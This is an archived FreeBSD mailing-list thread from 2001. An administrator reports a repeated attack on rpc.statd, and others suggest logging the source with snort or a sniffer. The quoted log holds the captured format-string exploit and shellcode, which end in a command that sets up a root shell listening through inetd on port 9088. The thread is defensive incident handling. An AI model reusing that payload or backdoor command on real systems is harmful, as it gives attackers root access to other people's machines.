Date: Thu, 4 Jan 2001 10:48:23 -0500 From: "Raymond Hicks" <rayhicks@UU.NET> To: "'Guy Helmer'" <ghelmer@palisadesys.com>, <Eric_Stanfield@kenokozie.com> Cc: <freebsd-questions@FreeBSD.ORG> Subject: RE: hack attempt (again) - help Message-ID: <003801c07665$c5b4d170$d7902799@sysenglt112> In-Reply-To: <Pine.LNX.4.21.0101040919451.10523-100000@magellan.palisadesys.com>
next in thread | previous in thread | raw e-mail | index | archive | help
why dont you just run a sniffer? -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Guy Helmer Sent: Thursday, January 04, 2001 10:26 AM To: Eric_Stanfield@kenokozie.com Cc: freebsd-questions@FreeBSD.ORG Subject: Re: hack attempt (again) - help On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote: > Alright this jerkoff has once again attempted to hack one of my freebsd > machines by trying what I assume is a buffer overflow to rpc: > > Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: > ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x %08x %08x > %08x %08x %08x %08x %08x %08x %08x > %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM- ^PëK^M- > > v¬M-^Cî M-^M^(M-^CÆ M- ^°M-^Cî M-^M^.M-^CÆ M-^Cà M-^Cë#M- ^´1ÀM-^Cî > M-^HF'M-^HF*M-^CÆ M-^HF«M- F¸°+, M- óM-^MN¬M-^MV¸ÍM-^@1ÛM- > Ø@ÍM-^@è°ÿÿÿ/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >> > /tmp/m; /usr/sbin/inetd /tmp/m; > > The interesting bit is what he (she?) is attempting to sneak in at the end > of the garbage sent to the port. > > I've given the system a thorough check and this seems to have been a second > failed attempt. I'm now annoyed, however, and would like to be able to at > least log what address this stuff is originating from. Can anyone suggest > something from the ports that would do the trick? I've disabled nfs/rpc > but I'm sure the hacker will come knocking again. snort with a current copy of the rule set from http://www.whitehats.com/ids/index.html ought to detect this (and lots of other script kiddie attempts). Guy -- Guy Helmer, Ph.D. Sr. Software Engineer, Palisade Systems --- ghelmer@palisadesys.com http://www.palisadesys.com/~ghelmer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?003801c07665$c5b4d170$d7902799>